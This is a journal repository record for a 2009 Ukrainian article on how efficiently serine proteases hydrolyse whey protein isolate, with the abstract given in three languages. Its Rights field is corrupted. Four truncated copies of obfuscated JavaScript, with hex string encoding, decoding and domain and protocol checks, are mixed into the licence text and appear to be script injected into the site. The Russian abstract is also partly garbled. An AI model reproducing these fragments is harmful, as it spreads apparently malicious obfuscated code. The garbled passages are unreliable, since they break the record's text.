Record Details

Efficiency of hydrolysis of whey protein serine proteases

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Efficiency of hydrolysis of whey protein serine proteases
Эффективность гидролиза белков молочной сыворотки сериновыми протеазами
ЕФЕКТИВНІСТЬ ГІДРОЛІЗУ ПРОТЕЇНІВ МОЛОЧНОЇ СИРОВАТКИ СЕРИНОВИМИ ПРОТЕАЗАМИ
 
Creator Петюх, Г.П.
Романова, Н.А.
Гаркава, К.М.
 
Subject

гідроліз; молочна сироватка; серинові протеази
 
Description  Research of relative enzymatic whey protein isolate (WPI) hydrolysis efficiency was conducted. Seven enzymes in three concentrations by pH 7.0 t=50°C were used. The most efficient showed to be Protease R in concentration 0,0002 g/ml.
 Исследован релативну эффективность энзиматического гидролиза изолята молочной сыворотки WPI с использованием семи ферментов класса сериновых протеаз в трех концентрациях при рН 7,0 и 50 ° C. эффективной оказалась протеаза R в концентрации 0,0002 г / мл.
 Дослідженo релативну ефективність ензиматичного гідролізу ізоляту молочної сироватки WPI з використанням семи ферментів класу серинових протеаз у трьох концентраціях за рН 7,0 та 50 °C. Найефективнішою виявилася протеаза R у концентрації 0,0002 г/мл.
 
Publisher National Aviation University
 
Contributor


 
Date 2009-02-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1718
10.18372/2306-1472.39.1718
 
Source Proceedings of the National Aviation University; Том 39, № 2 (2009); 94-96
Вестник Национального авиационного университета; Том 39, № 2 (2009); 94-96
Вісник Національного Авіаційного Університету; Том 39, № 2 (2009); 94-96
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ